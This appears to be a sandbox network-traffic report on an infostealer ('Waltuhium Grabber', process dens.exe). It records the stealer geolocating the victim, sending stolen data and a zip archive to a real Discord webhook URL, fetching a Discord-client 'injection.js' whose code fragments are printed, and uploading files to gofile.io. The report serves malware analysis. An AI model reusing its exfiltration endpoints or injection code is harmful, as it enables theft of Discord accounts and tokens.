                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.371592045 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.371611118 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.557254076 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.557293892 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.557770014 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.558401108 CET49761443192.168.2.445.112.123.227
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 13, 2024 00:38:40.255546093 CET | 62844 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 00:38:40.263880968 CET | 53 | 62844 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 00:38:53.892065048 CET | 61771 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 00:38:53.898650885 CET | 53 | 61771 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 00:38:57.369591951 CET | 56195 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 00:38:57.378124952 CET | 53 | 56195 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 00:38:59.949549913 CET | 53741 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 00:38:59.956377029 CET | 53 | 53741 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 00:39:01.547370911 CET | 60548 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 00:39:01.556431055 CET | 53 | 60548 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 13, 2024 00:38:40.255546093 CET | 192.168.2.4 | 1.1.1.1 | 0xc430 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:38:53.892065048 CET | 192.168.2.4 | 1.1.1.1 | 0xfa2b | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:38:57.369591951 CET | 192.168.2.4 | 1.1.1.1 | 0x6e41 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:38:59.949549913 CET | 192.168.2.4 | 1.1.1.1 | 0xfaa9 | Standard query (0) | api.gofile.io | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:39:01.547370911 CET | 192.168.2.4 | 1.1.1.1 | 0x5bb8 | Standard query (0) | store1.gofile.io | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 13, 2024 00:38:40.263880968 CET | 1.1.1.1 | 192.168.2.4 | 0xc430 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:38:53.898650885 CET | 1.1.1.1 | 192.168.2.4 | 0xfa2b | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:38:53.898650885 CET | 1.1.1.1 | 192.168.2.4 | 0xfa2b | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:38:53.898650885 CET | 1.1.1.1 | 192.168.2.4 | 0xfa2b | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:38:53.898650885 CET | 1.1.1.1 | 192.168.2.4 | 0xfa2b | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:38:53.898650885 CET | 1.1.1.1 | 192.168.2.4 | 0xfa2b | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:38:57.378124952 CET | 1.1.1.1 | 192.168.2.4 | 0x6e41 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:38:57.378124952 CET | 1.1.1.1 | 192.168.2.4 | 0x6e41 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:38:57.378124952 CET | 1.1.1.1 | 192.168.2.4 | 0x6e41 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:38:57.378124952 CET | 1.1.1.1 | 192.168.2.4 | 0x6e41 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:38:59.956377029 CET | 1.1.1.1 | 192.168.2.4 | 0xfaa9 | No error (0) | api.gofile.io | | 45.112.123.126 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 00:39:01.556431055 CET | 1.1.1.1 | 192.168.2.4 | 0x5bb8 | No error (0) | store1.gofile.io | | 45.112.123.227 | A (IP address) | IN (0x0001) | false
• discord.com
• raw.githubusercontent.com
• api.gofile.io
• store1.gofile.io
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49740 | 208.95.112.1 | 80 | 6500 | C:\Users\user\Desktop\dens.exe

Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 00:38:40.285893917 CET | 129 | OUT | GET /json HTTP/1.1
Host: ip-api.com
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Python/3.12 aiohttp/3.10.5
Nov 13, 2024 00:38:40.880889893 CET | 468 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 23:38:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 291
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.68"}


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.449752162.159.128.2334436500C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-12 23:38:54 UTC282OUTPOST /api/webhooks/1295868334612418591/QuvcFisisSeqgiaaEigFghTgy3B5fdld_JRxA14GVrqmyygbrLTztN99jPEX8IcFYc7T HTTP/1.1
                                                                                                                                                                                                                                            Host: discord.com
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
                                                                                                                                                                                                                                            Content-Length: 1311
                                                                                                                                                                                                                                            2024-11-12 23:38:54 UTC1311OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 77 61 6c 74 75 68 69 75 6d 20 7c 20 74 2e 6d 65 2f 77 61 6c 74 75 68 69 75 6d 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 57 61 6c 74 75 68 69 75 6d 20 47 72 61 62 62 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 57 61 6c 74 75 68 69 75 6d 20 47 72 61 62 62 65 72 20 46 75 6c 6c 20 49 6e 66 6f 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 77 61 6c 74 75 68 69 75 6d 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 67 69 74 68 75 62 22 7d 2c 20 22 74 68 75 6d 62 6e 61 69 6c 22 3a 20 7b 22 75 72 6c 22 3a 20 22 77 65 62 68 6f 6f 6b 22 7d 2c 20 22 66 69 65
                                                                                                                                                                                                                                            Data Ascii: {"username": "waltuhium | t.me/waltuhium", "embeds": [{"title": "***Waltuhium Grabber***", "description": "***Waltuhium Grabber Full Info***", "url": "https://t.me/waltuhium", "color": 0, "footer": {"text": "github"}, "thumbnail": {"url": "webhook"}, "fie
2024-11-12 23:38:54 UTC  1253               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:38:54 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                                            x-ratelimit-reset: 1731454736
                                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E828AVbhGugyqVGLPhmHBb5U4Fg1xGA6Tk2O23S2an1hba95j8VNgqPPFdzhBzB1d3ATG1%2Fpf8QHWFwhMOB1zjvKfP2JKvm%2B1Ku3ylPkM4ERbQzOmOnBttRRLJLI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            Set-Cookie: __cfruid=b4fe6e672b6a1d8dbc1bc903c4e4d946e08efe60-1731454734; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                            Set-Cookie: _cfuvid=jksrHuwgi48AtT.0Eupf2voBCFAB43FLFLVhTeE9FnI-1731454734658-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8e1a5bbb3d6d3583-DFW
                                                                                                                                                                                                                                            2024-11-12 23:38:54 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
1           192.168.2.4  49753        162.159.128.233  443               6500  C:\Users\user\Desktop\dens.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-12 23:38:55 UTC  281                OUT        POST /api/webhooks/1295868334612418591/QuvcFisisSeqgiaaEigFghTgy3B5fdld_JRxA14GVrqmyygbrLTztN99jPEX8IcFYc7T HTTP/1.1
                                                                                                                                                                                                                                            Host: discord.com
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
                                                                                                                                                                                                                                            Content-Length: 438
                                                                                                                                                                                                                                            2024-11-12 23:38:55 UTC438OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 77 61 6c 74 75 68 69 75 6d 20 7c 20 74 2e 6d 65 2f 77 61 6c 74 75 68 69 75 6d 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 57 61 6c 74 75 68 69 75 6d 20 47 72 61 62 62 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 4b 65 79 77 6f 72 64 20 52 65 73 75 6c 74 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 77 61 6c 74 75 68 69 75 6d 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 67 69 74 68 75 62 22 7d 2c 20 22 74 68 75 6d 62 6e 61 69 6c 22 3a 20 7b 22 75 72 6c 22 3a 20 22 77 65 62 68 6f 6f 6b 22 7d 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65
                                                                                                                                                                                                                                            Data Ascii: {"username": "waltuhium | t.me/waltuhium", "embeds": [{"title": "***Waltuhium Grabber***", "description": "***Keyword Result***", "url": "https://t.me/waltuhium", "color": 0, "footer": {"text": "github"}, "thumbnail": {"url": "webhook"}, "fields": [{"name
2024-11-12 23:38:55 UTC  1257               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:38:55 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                                            x-ratelimit-reset: 1731454736
                                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4JODxRD7CJ9x5uuyA3G0YfusieZaBpUO4%2BbqOIWjAapORqiek10j8s%2FcLVW1hLrP7YtPoEgK4iVRpVb4cf2bHgmLteop%2F3XbRb%2BSTqMCJqRrJtjH8PLOuUd5XJzj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            Set-Cookie: __cfruid=9dba5449c019f2fb2e6b326e2136aa66df548017-1731454735; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                            Set-Cookie: _cfuvid=cKhzjvou17nQeUzv5Xf8o9mP4iIFwtHtb226JZIYU7k-1731454735463-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8e1a5bc03bbc2cd2-DFW
                                                                                                                                                                                                                                            2024-11-12 23:38:55 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
2           192.168.2.4  49754        162.159.138.232  443               6500  C:\Users\user\Desktop\dens.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-12 23:38:56 UTC  485                OUT        POST /api/webhooks/1295868334612418591/QuvcFisisSeqgiaaEigFghTgy3B5fdld_JRxA14GVrqmyygbrLTztN99jPEX8IcFYc7T HTTP/1.1
                                                                                                                                                                                                                                            Host: discord.com
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
                                                                                                                                                                                                                                            Cookie: __cfruid=b4fe6e672b6a1d8dbc1bc903c4e4d946e08efe60-1731454734; _cfuvid=jksrHuwgi48AtT.0Eupf2voBCFAB43FLFLVhTeE9FnI-1731454734658-0.0.1.1-604800000
                                                                                                                                                                                                                                            Content-Length: 700699
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=352a3e1a846f481f992618ffec72422d
                                                                                                                                                                                                                                            2024-11-12 23:38:56 UTC36OUTData Raw: 2d 2d 33 35 32 61 33 65 31 61 38 34 36 66 34 38 31 66 39 39 32 36 31 38 66 66 65 63 37 32 34 32 32 64 0d 0a
                                                                                                                                                                                                                                            Data Ascii: --352a3e1a846f481f992618ffec72422d
                                                                                                                                                                                                                                            2024-11-12 23:38:56 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 37 31 34 33 34 44 35 36 2d 31 35 34 38 2d 45 44 33 44 2d 41 45 45 36 2d 43 37 35 41 45 43 44 39 33 42 46 30 2e 7a 69 70 22 0d 0a 0d 0a
Data Ascii: Content-Type: application/octet-stream
Content-Disposition: form-data; name="file"; filename="71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip"
                                                                                                                                                                                                                                            Data Ascii: H0;5$0=<6WahN;*jJz4%cs*NO5{[]rz"}V?N$Flr~aK'>T|,KeBoWW? \n^7zga=w,j|_`7'xs$b[x%j^4F5F
2024-11-12 23:38:57 UTC | 956 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:38:57 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                                            x-ratelimit-reset: 1731454738
                                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PXwzgwwbEGRs1xEifo4GwpCxmbqG7m%2F1ZIUpQCJYe0HNKbi07rOlEItVnZCnTm31pRqOTdvgr1dg0kq0sAUYnBcBDjc3bA2WrJcC5U5Mn0GzVCAq71rsrSmEL9CN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8e1a5bc5abe93160-DFW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49757 | 185.199.108.133 | 443 | 6500 | C:\Users\user\Desktop\dens.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 23:38:58 UTC | 186 | OUT | GET /antivirusevasion23/injection/main/injection.js HTTP/1.1
                                                                                                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
2024-11-12 23:38:58 UTC | 900 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Content-Length: 29588
                                                                                                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                            ETag: "2547a391b86f469cdb5036789d86ca9d30a0086b3059ced3d8bae20330bee446"
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            X-GitHub-Request-Id: 9C6F:245694:E036C:ED820:6733E710
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:38:58 GMT
                                                                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                                                                            X-Served-By: cache-dfw-ktki8620051-DFW
                                                                                                                                                                                                                                            X-Cache: MISS
                                                                                                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                                                                                                            X-Timer: S1731454738.103605,VS0,VE119
                                                                                                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                            X-Fastly-Request-ID: 063f0bd8d77beb1225b57c3775dbca8ef14ad222
                                                                                                                                                                                                                                            Expires: Tue, 12 Nov 2024 23:43:58 GMT
                                                                                                                                                                                                                                            Source-Age: 0
2024-11-12 23:38:58 UTC | 1378 | IN
                                                                                                                                                                                                                                            Data Ascii: const args = process.argv;const fs = require('fs');const path = require('path');const https = require('https');const querystring = require('querystring');const { BrowserWindow, session } = require('electron');const config = { webhook: '%W
2024-11-12 23:38:58 UTC | 1378 | IN
                                                                                                                                                                                                                                            Data Ascii: 'https://discord.com/api/v*/users/@me', 'https://discordapp.com/api/v*/users/@me', 'https://*.discord.com/api/v*/users/@me', 'https://discordapp.com/api/v*/auth/login', 'https://discord.com/api/v*/auth/login', 'https://
2024-11-12 23:38:58 UTC | 1378 | IN
                                                                                                                                                                                                                                            Data Ascii: return ((msw & 0xffff) << 16) | (lsw & 0xffff);}function safeAdd_32_5(a, b, c, d, e) { var lsw = (a & 0xffff) + (b & 0xffff) + (c & 0xffff) + (d & 0xffff) + (e & 0xffff), msw = (a >>> 16) + (b >>> 16) + (c >>> 16) + (d >>> 16) + (e >>> 16)
2024-11-12 23:38:58 UTC | 1378 | IN
                                                                                                                                                                                                                                            Data Ascii: eAdd_5(rotl(a, 5), parity(b, c, d), e, 0x6ed9eba1, W[t]); } else if (t < 60) { T = safeAdd_5(rotl(a, 5), maj(b, c, d), e, 0x8f1bbcdc, W[t]); } else { T = safeAdd_5(rotl(a, 5), parity(b, c, d), e, 0xca62c1d6, W[t]); } e
2024-11-12 23:38:58 UTC | 1378 | IN
                                                                                                                                                                                                                                            Data Ascii: ring of HEX type must be in byte increments'); } for (i = 0; i < length; i += 2) { num = parseInt(str.substr(i, 2), 16); if (!isNaN(num)) { byteOffset = (i >>> 1) + existingByteLen; intOffset = byteOffset >>> 2; whil
2024-11-12 23:38:58 UTC | 1378 | IN
                                                                                                                                                                                                                                            Data Ascii: keyConverterFunc = hex2binb; convertRet = keyConverterFunc(key); keyBinLen = convertRet['binLen']; keyToUse = convertRet['value']; blockByteSize = variantBlockSize >>> 3; lastArrayIndex = blockByteSize / 4 - 1;
2024-11-12 23:38:58 UTC | 1378 | IN
                                                                                                                                                                                                                                            Data Ascii: 'value']; chunkIntLen = chunkBinLen >>> 5; for (i = 0; i < chunkIntLen; i += variantBlockIntInc) { if (updateProcessedLen + variantBlockSize <= chunkBinLen) { intermediateH = roundFunc(chunk.slice(i, i + variantBlockInt
2024-11-12 23:38:58 UTC | 1378 | IN
                                                                                                                                                                                                                                            Data Ascii: module['exports'] = exports = jsSHA; } else { exports = jsSHA; }} else { global['jsSHA'] = jsSHA;}if (jsSHA.default) { jsSHA = jsSHA.default;}function totp(key) { const period = 30; const digits = 6; const timestam
2024-11-12 23:38:58 UTC | 1378 | IN
                                                                                                                                                                                                                                            Data Ascii: hex = hex + leftpad(parseInt(chunk, 2).toString(16), 2, '0'); } return hex;}function leftpad(str, len, pad) { if (len + 1 >= str.length) { str = Array(len + 1 - str.length).join(pad) + str; } return str;}const discordPath
2024-11-12 23:38:58 UTC | 1378 | IN
                                                                                                                                                                                                                                            Data Ascii: ); if (fs.existsSync(resourceIndex)) fs.unlinkSync(resourceIndex); if (process.platform === 'win32' || process.platform === 'darwin') { fs.writeFileSync( packageJson, JSON.stringify( { name: 'discord',


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49760 | 45.112.123.126 | 443 | 6500 | C:\Users\user\Desktop\dens.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 23:39:01 UTC | 137 | OUT | GET /getServer HTTP/1.1
                                                                                                                                                                                                                                            Host: api.gofile.io
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
2024-11-12 23:39:01 UTC | 1113 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Server: nginx/1.27.1
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:39:01 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 14
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                            Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                            Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                                            X-Download-Options: noopen
                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                            ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
2024-11-12 23:39:01 UTC | 14 | IN | Data Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
                                                                                                                                                                                                                                            Data Ascii: error-notFound


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49761 | 45.112.123.227 | 443 | 6500 | C:\Users\user\Desktop\dens.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 23:39:02 UTC | 243 | OUT | POST /uploadFile HTTP/1.1
                                                                                                                                                                                                                                            Host: store1.gofile.io
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
                                                                                                                                                                                                                                            Content-Length: 79296
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=a2aa766b0cfb48099421bc0f609b093d
2024-11-12 23:39:02 UTC | 36 | OUT | Data Raw: 2d 2d 61 32 61 61 37 36 36 62 30 63 66 62 34 38 30 39 39 34 32 31 62 63 30 66 36 30 39 62 30 39 33 64 0d 0a
                                                                                                                                                                                                                                            Data Ascii: --a2aa766b0cfb48099421bc0f609b093d
